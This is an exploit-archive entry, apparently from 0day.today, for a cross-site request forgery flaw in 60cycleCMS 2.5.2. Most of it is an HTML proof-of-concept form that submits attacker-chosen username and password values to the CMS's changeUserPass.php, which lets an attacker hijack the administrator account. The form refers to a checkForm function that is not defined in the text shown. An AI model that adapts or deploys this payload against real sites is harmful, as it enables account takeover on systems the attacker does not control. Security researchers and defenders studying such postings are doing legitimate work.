60cycleCMS V 2.5.2 CSRF Change Username & Password Exploit

2010-04-16T00:00:00
ID 1337DAY-ID-11842
Type zdt
Reporter El-Kahina
Modified 2010-04-16T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==========================================================
60cycleCMS V 2.5.2 CSRF Change Username & Password Exploit
==========================================================

========================================================================================                 
| # Title    : 60 cycleCMS V 2.5.2 CSRF Change Username & Password Exploit
| # Author   : EL-KAHINA                                                                                                                
| # Home     : www.iqs3cur1ty.com/vb    
| # Web Site : http://php.opensourcecms.com/scripts/details.php?scriptid=337                                                                           
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : CSRF                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  :
  
<html>
<body>
<h2>Change Username or Password</h2>
<p>Enter desired username and password.</p>
<form action="http://127.0.0.1/60cycleCMS.2.5.2/private/changeUserPass.php" method="post" name="changeUserPass">
Desired Username: <input name="user" type="text" /><br />
Desired Password: <input name="pass" type="password"/><br />
Confirm Desired Password: <input name="passConfirm" type="password"/><br />
<input type="button" value="Submit" onclick="checkForm(this.form)" />
</form>
</body>
</html>



#  0day.today [2018-02-02]  #